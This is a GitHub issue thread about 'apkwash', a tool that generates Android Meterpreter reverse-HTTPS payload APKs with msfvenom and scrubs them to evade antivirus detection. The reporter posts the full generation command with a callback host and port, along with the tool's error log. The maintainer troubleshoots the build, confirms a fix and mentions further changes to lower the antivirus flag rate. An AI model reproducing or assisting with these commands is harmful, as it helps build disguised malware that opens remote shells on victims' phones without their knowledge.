### ISSUE TITLE
mv: cannot stat '/tmp/payload/smali/com/metasploit'

### ISSUE THREAD

**Issue by sabrex123** [jbreed/apkwash#4]
i need help here. how to fix this 
$ apkwash -p android/meterpreter/reverse_https lhost=192.168.1.102 lport=4444 -o /root/Desktop/asd.apk

 [-]  Generating MSFVenom payload
 [-]  msfvenom -p android/meterpreter/reverse_https LHOST=192.168.1.102 LPORT=443 -o /root/Desktop/asd.apk
 [-]  MSFVenom payload successfully generated.
 [-]  Opening the generated payload with APKTool.
 [-]  Scrubbing the payload contents to avoid AV signatures...
mv: cannot stat '/tmp/payload/smali/com/metasploit': No such file or directory
mv: cannot stat '/tmp/payload/smali/com/owkyekerbp/stage': No such file or directory
mv: cannot stat '/tmp/payload/smali/com/owkyekerbp/gxqskstfpk/Payload.smali': No such file or directory
sed: can't read /tmp/payload/smali/com/owkyekerbp/gxqskstfpk/*: No such file or directory
sed: can't read /tmp/payload/smali/com/owkyekerbp/gxqskstfpk/*: No such file or directory
sed: can't read /tmp/payload/smali/com/owkyekerbp/gxqskstfpk/nqljlwqgpu.smali: No such file or directory
sed: can't read /tmp/payload/smali/com/owkyekerbp/gxqskstfpk/nqljlwqgpu.smali: No such file or directory
sed: can't read /tmp/payload/AndroidManifest.xml: No such file or directory
sed: can't read /tmp/payload/AndroidManifest.xml: No such file or directory
sed: can't read /tmp/payload/res/values/strings.xml: No such file or directory
sed: can't read /tmp/payload/AndroidManifest.xml: No such file or directory
sed: can't read /tmp/payload/AndroidManifest.xml: No such file or directory
 [-]  Finished scrubbing the content. Rebuilding the package with APKTool.
 [-]  Washed package created: /root/Desktop/asd.apk
mv: cannot stat '/tmp/payload/dist/AndroidService.apk': No such file or directory
 [-]  Checking for ~/.android/debug.keystore for signing

somebody can tell me how to fix this ?? Thanks

**Comment by jbreed** [comment]
It appears it wasn't able to locate the payload generated by msfvenom after using apktool. I'll update my system and make sure nothing broke. Be sure to stay updated as well.

apt-get update && apt-get dist-upgrade

**Comment by jbreed** [comment]
Taking a quick look with your command I see the same issue. Simply removing the output '-o /root/Desktop/asd.apk' resolved this and it functions (haven't actually launched meterpreter to verify completely, but it generates without errors)

**Comment by jbreed** [comment]
Currently looking at a fix for this bug regarding the '-o' option. Leave it off in the meantime to utilize the default, which appears to function.

**Comment by jbreed** [comment]
The bug has been resolved. Thanks for your input! 

Give this another go and if having another issue please feel free to open another issue.

**Comment by ahmed890** [comment]
Please solve the problem

**Comment by jbreed** [comment]
@ahmed890, have you tried removing the output '-o' option? I haven't looked at this script in a while, but if you are experiencing an issue please post what your command was the the given output and I'll see what may be causing it.

Thanks

**Comment by jbreed** [comment]
Posted another update after verifying the script is still operational. Found the app name to not be modified in the script and added it in. Some changed can be made to lower AV flag rate, but should be good to go.
